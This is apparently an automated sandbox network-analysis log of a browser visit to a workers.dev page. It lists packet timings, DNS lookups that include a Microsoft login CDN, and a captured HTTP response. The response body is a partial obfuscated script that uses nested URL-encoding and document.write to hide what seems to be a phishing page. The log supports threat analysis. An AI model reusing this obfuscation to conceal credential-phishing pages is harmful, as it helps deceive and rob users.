                                  Apr 18, 2024 01:13:27.526981115 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.527328968 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.527343988 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.528470993 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.528772116 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.528924942 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.528939962 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.577411890 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.783986092 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784046888 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784084082 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784132957 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.784141064 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784199953 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.784204006 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784255981 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.784634113 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784759998 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784862041 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.784883976 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.784894943 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.785007954 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.785104990 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.785490990 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.785502911 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.788047075 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:27.788073063 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:27.788177967 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:27.788369894 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:27.788382053 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.013957977 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.014368057 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.014391899 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.015486002 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.015971899 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.016168118 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.016179085 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.060163975 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.061148882 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.271886110 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272006035 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272057056 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.272066116 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272222042 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272288084 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.272293091 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272392988 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272439957 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.272444963 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272535086 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272582054 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.272587061 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272676945 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272741079 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.272746086 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272908926 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:28.272964001 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.292138100 CEST49764443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:28.292161942 CEST44349764172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:14:12.109913111 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.109946966 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.110007048 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.110306025 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.110321045 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.329657078 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.329969883 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.329998016 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.331450939 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.331770897 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.331855059 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.331897974 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.372194052 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.374289036 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.569067001 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.569247007 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.569295883 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.569309950 CEST4434976735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.569325924 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.569325924 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.569349051 CEST49767443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.569907904 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.569977045 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.570065022 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.570333958 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.570353985 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.789510012 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.789791107 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.789827108 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.791310072 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.791640997 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.791762114 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:12.791774988 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.791902065 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:12.843102932 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:13.031925917 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:13.032131910 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:13.032382011 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:13.032658100 CEST49768443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:14:13.032694101 CEST4434976835.190.80.1192.168.2.4
                                  Apr 18, 2024 01:14:13.725387096 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:13.725471020 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:13.729324102 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:13.729806900 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:13.729863882 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:13.949683905 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:13.950064898 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:13.950123072 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:13.951451063 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:13.951762915 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:13.951942921 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:13.995873928 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:16.592595100 CEST4972380192.168.2.423.40.205.73
                                  Apr 18, 2024 01:14:16.592803955 CEST4972480192.168.2.496.7.245.27
                                  Apr 18, 2024 01:14:16.697124004 CEST804972496.7.245.27192.168.2.4
                                  Apr 18, 2024 01:14:16.697185993 CEST804972323.40.205.73192.168.2.4
                                  Apr 18, 2024 01:14:16.697211027 CEST4972480192.168.2.496.7.245.27
                                  Apr 18, 2024 01:14:16.697246075 CEST4972380192.168.2.423.40.205.73
                                  Apr 18, 2024 01:14:23.946877003 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:23.947026968 CEST4434976964.233.177.105192.168.2.4
                                  Apr 18, 2024 01:14:23.947096109 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:25.751665115 CEST49769443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:14:25.751723051 CEST4434976964.233.177.105192.168.2.4
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 18, 2024 01:13:09.565557003 CEST53572431.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:09.615722895 CEST53502181.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:10.221992016 CEST53536181.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:10.768034935 CEST5097753192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:10.768326044 CEST6358353192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:10.879435062 CEST53635831.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:10.879848003 CEST53509771.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:11.495798111 CEST6396953192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:11.496069908 CEST5821253192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:11.603291035 CEST53639691.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:11.607146025 CEST53582121.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:11.629713058 CEST53499011.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:12.096528053 CEST5075853192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:12.096632957 CEST5533253192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:12.201231956 CEST53507581.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:12.201679945 CEST53553321.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:12.621568918 CEST5946753192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:12.621570110 CEST6081653192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:12.733680010 CEST53608161.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:12.733827114 CEST53594671.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:13.675285101 CEST6245353192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:13.675607920 CEST6248653192.168.2.41.1.1.1
                                  Apr 18, 2024 01:13:13.779755116 CEST53624861.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:13.779810905 CEST53624531.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:27.183264017 CEST53607491.1.1.1192.168.2.4
                                  Apr 18, 2024 01:13:28.178025961 CEST138138192.168.2.4192.168.2.255
                                  Apr 18, 2024 01:13:46.277368069 CEST53562591.1.1.1192.168.2.4
                                  Apr 18, 2024 01:14:09.236268044 CEST53590151.1.1.1192.168.2.4
                                  Apr 18, 2024 01:14:09.440047026 CEST53553691.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 18, 2024 01:13:10.768034935 CEST192.168.2.41.1.1.10x4f98Standard query (0)nsjw.newf.workers.devA (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:10.768326044 CEST192.168.2.41.1.1.10x7957Standard query (0)nsjw.newf.workers.dev65IN (0x0001)false
                                  Apr 18, 2024 01:13:11.495798111 CEST192.168.2.41.1.1.10xd878Standard query (0)www.linkpicture.comA (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.496069908 CEST192.168.2.41.1.1.10x4d2dStandard query (0)www.linkpicture.com65IN (0x0001)false
                                  Apr 18, 2024 01:13:12.096528053 CEST192.168.2.41.1.1.10x6d80Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.096632957 CEST192.168.2.41.1.1.10x34c4Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                  Apr 18, 2024 01:13:12.621568918 CEST192.168.2.41.1.1.10xc831Standard query (0)nsjw.newf.workers.devA (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.621570110 CEST192.168.2.41.1.1.10x6380Standard query (0)nsjw.newf.workers.dev65IN (0x0001)false
                                  Apr 18, 2024 01:13:13.675285101 CEST192.168.2.41.1.1.10xfd21Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.675607920 CEST192.168.2.41.1.1.10x4177Standard query (0)www.google.com65IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 18, 2024 01:13:10.879435062 CEST1.1.1.1192.168.2.40x7957No error (0)nsjw.newf.workers.dev65IN (0x0001)false
                                  Apr 18, 2024 01:13:10.879848003 CEST1.1.1.1192.168.2.40x4f98No error (0)nsjw.newf.workers.dev104.21.50.103A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:10.879848003 CEST1.1.1.1192.168.2.40x4f98No error (0)nsjw.newf.workers.dev172.67.204.185A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.477046967 CEST1.1.1.1192.168.2.40x9cfdNo error (0)shed.dual-low.part-0029.t-0009.t-msedge.netpart-0029.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.477046967 CEST1.1.1.1192.168.2.40x9cfdNo error (0)part-0029.t-0009.t-msedge.net13.107.246.57A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.477046967 CEST1.1.1.1192.168.2.40x9cfdNo error (0)part-0029.t-0009.t-msedge.net13.107.213.57A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.603291035 CEST1.1.1.1192.168.2.40xd878No error (0)www.linkpicture.com104.21.235.182A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.603291035 CEST1.1.1.1192.168.2.40xd878No error (0)www.linkpicture.com104.21.235.181A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:11.607146025 CEST1.1.1.1192.168.2.40x4d2dNo error (0)www.linkpicture.com65IN (0x0001)false
                                  Apr 18, 2024 01:13:12.125955105 CEST1.1.1.1192.168.2.40xc189No error (0)shed.dual-low.part-0013.t-0009.t-msedge.netpart-0013.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.125955105 CEST1.1.1.1192.168.2.40xc189No error (0)part-0013.t-0009.t-msedge.net13.107.213.41A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.125955105 CEST1.1.1.1192.168.2.40xc189No error (0)part-0013.t-0009.t-msedge.net13.107.246.41A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.201231956 CEST1.1.1.1192.168.2.40x6d80No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.733680010 CEST1.1.1.1192.168.2.40x6380No error (0)nsjw.newf.workers.dev65IN (0x0001)false
                                  Apr 18, 2024 01:13:12.733827114 CEST1.1.1.1192.168.2.40xc831No error (0)nsjw.newf.workers.dev172.67.204.185A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:12.733827114 CEST1.1.1.1192.168.2.40xc831No error (0)nsjw.newf.workers.dev104.21.50.103A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779755116 CEST1.1.1.1192.168.2.40x4177No error (0)www.google.com65IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779810905 CEST1.1.1.1192.168.2.40xfd21No error (0)www.google.com64.233.177.105A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779810905 CEST1.1.1.1192.168.2.40xfd21No error (0)www.google.com64.233.177.104A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779810905 CEST1.1.1.1192.168.2.40xfd21No error (0)www.google.com64.233.177.147A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779810905 CEST1.1.1.1192.168.2.40xfd21No error (0)www.google.com64.233.177.103A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779810905 CEST1.1.1.1192.168.2.40xfd21No error (0)www.google.com64.233.177.99A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:13.779810905 CEST1.1.1.1192.168.2.40xfd21No error (0)www.google.com64.233.177.106A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.51.26A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.48.34A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.50.40A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.48.37A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.53.36A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.51.43A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.63.35A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:23.205138922 CEST1.1.1.1192.168.2.40xfb82No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.50.35A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:24.354463100 CEST1.1.1.1192.168.2.40xf68fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                  Apr 18, 2024 01:13:24.354463100 CEST1.1.1.1192.168.2.40xf68fNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:13:36.696538925 CEST1.1.1.1192.168.2.40x6014No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                  Apr 18, 2024 01:13:36.696538925 CEST1.1.1.1192.168.2.40x6014No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:14:01.410710096 CEST1.1.1.1192.168.2.40xaf74No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                  Apr 18, 2024 01:14:01.410710096 CEST1.1.1.1192.168.2.40xaf74No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                  Apr 18, 2024 01:14:22.169590950 CEST1.1.1.1192.168.2.40x60dcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                  Apr 18, 2024 01:14:22.169590950 CEST1.1.1.1192.168.2.40x60dcNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                  • nsjw.newf.workers.dev
                                  • https:
                                    • aadcdn.msauth.net
                                    • www.linkpicture.com
                                  • a.nel.cloudflare.com
                                  • fs.microsoft.com
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449735104.21.50.1034433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:11 UTC664OUTGET / HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  sec-ch-ua-platform: "Windows"
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: navigate
                                  Sec-Fetch-User: ?1
                                  Sec-Fetch-Dest: document
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:11 UTC562INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:11 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zhgw4cS04%2Fn42Dtim7zu8VEvnVAeLE6%2B5RmnlRKC5vbIq%2Fc%2BGfqmMgVB%2BPDjRHp%2FBDR3fryRp%2BOfEeLmUuYgpp2k1MzbfiCOjONoXasVkDA6K%2BtZaigDkPOzo8X2Av9xYTXO9rG1%2FBw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601aad8e8f8bb8-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:11 UTC807INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:11 UTC1369INData Raw: 25 32 35 32 37 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25 32 35
                                  Data Ascii: %2527%2529%253B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%25
                                  2024-04-17 23:13:11 UTC1369INData Raw: 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35
                                  Data Ascii: on%257B%250A%2520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%25
                                  2024-04-17 23:13:11 UTC1369INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25
                                  Data Ascii: %2520%2520%2520display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253A%
